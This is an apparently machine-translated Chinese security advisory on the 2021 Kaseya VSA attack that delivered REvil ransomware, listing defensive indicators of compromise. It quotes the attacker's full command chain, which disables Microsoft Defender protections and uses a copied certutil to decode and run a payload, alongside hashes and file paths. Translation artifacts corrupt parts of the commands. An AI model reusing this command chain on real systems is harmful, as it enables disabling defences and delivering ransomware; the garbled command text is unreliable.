2021年7月3日美国东部时间上午10:00,远程IT管理软件供应商Kaseya发布紧急安全预警,Kaseya的VSA产品变得复杂作为网络攻击的受害者,攻击者正在使用Kaseya来分发REvil勒索软件。Kasaya安全咨询:“我们继续强烈建议我们的本地客户的VSA服务器保持关闭状态,直至另行通知。我们还将使我们的SaaS服务器保持离线状态,直至另行通知。我们的外部专家已向我们提出建议,他们遇到了勒索软件和接收攻击者通信的客户不应点击任何链接——它们可能被武器化。”原始公告:https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689Bitdefender正在积极监控和分析使用KaseyaAdvancedAttack发起的攻击,Bitdefender迄今为止的调查结果表明,Bitdefender解决方案保护Bitdefender客户免受这种复杂的攻击检测并阻止攻击中使用的命令行操作和传递的恶意负载。由于这是一个不断变化的情况,我们将在可用时用更多信息更新这篇文章。Bitdefender客户指南:Kaseya安全咨询,恳请其客户立即关闭本地VSA服务器。我们建议所有KaseyaVSA用户立即遵循本指南。检查本地和混合环境中已知的IoC指标(IoC)-IoC列表如下。美国网络安全和基础设施安全局(CISA)已发出警报,称他们正在监视有关对KaseyaVSA和多个使用VSA软件的MSP的攻击的详细信息。我们建议组织关注CISA警报以获取未来更新。经过验证的IoC指标:1。从Kaseya代理执行的命令:C:\Windows\system32\cmd.exe”/cping127.0.0.1-n5825>nul&C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSet-MpPreference-DisableRealtimeMonitoring$true-DisableIntrusionPreventionSystem$true-DisableIOAVProtection$true-DisableScriptScanning$true-EnableControlledFolderAccess已禁用-EnableNetworkProtectionAuditMode-Force-MAPSReporting已禁用-SubmitSamplesConsentNeverSend©/YC:\Windows\System32\certutil.exeC:\Windows\cert.exe&echo%RANDOM%>>C:\Windows\cert.exe&C:\Windows\cert.exe-decodec:\kworking\agent.crtc:\kworking\agent.exe&del/q/fc:\kworking\agent.crtC:\Windows\cert.exe&c:\kworking\agent.exe和C:\WINDOWS\system32\cmd.exe/cping127.0.0.1-n3637>nul&C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe设置-MpPreference-DisableRealtimeMonitoring$true-DisableIntrusionPreventionSystem$true-DisableIOAVProtection$true-DisableScriptScanning$true-EnableControlledFolderAccess已禁用-EnableNetworkProtectionAuditMode-Force-MAPSReporting已禁用-SubmitSamplesConsentNeverSend©/YC:\Windows\System32\certutil.exeC:\Windows\cert.exe&echo%RANDOM%>>C:\Windows\cert.exe&C:\Windows\cert.exe-decodec:\WaRCoMWorking\agent.crtc:\WaRCoMWorking\agent.exe&del/q/fc:\WaRCoMWorking\agent.crtC:\Windows\cert.exe&c:\WaRCoMWorking\agent.exe2。哈希:561cffbaba71a6e8cc1cdceda990ead4,Bitdefender已于2021年5月15日检测到,检测为Gen:Variant.Graftor.952042这是使用certutil.exe加密的主密钥可执行文件(c:\kworking\agent.exe)a47cf00aedf769d60d58bfe00c0b5421在Bitdefender上检测到,2021年5月13日,作为Gen:Variant.Bulz.471680。这是一个由主要可执行文件删除并使用MSmsmpeng.exe可执行文件旁加载的DLL。0293a5d21081a94a5589976b407f5675–agent.crt的哈希值(解密前agent.exe的内容)。3.文件路径:c:\WarCoMWorking\agent.crtc:\\WarCoMWorking\agent.exec:\kworking\agent.exec:\kworking\agent.crtc:\windows\msmpeng.exe(旧版本,容易受到DLL侧载影响)。此版本由主要可执行文件删除,并进一步用于加载DLL(a47cf00aedf769d60d58bfe00c0b5421)。文件版本:MsMpEng.exe,MicrosoftMalwareProtection,4.5.0218.0使用BitdefenderEDR的客户可以使用IOC扫描功能全网搜索IOC指标:添加黑名单规则:在黑名单区域,可以添加hash的以上IOC,全网封锁运行:
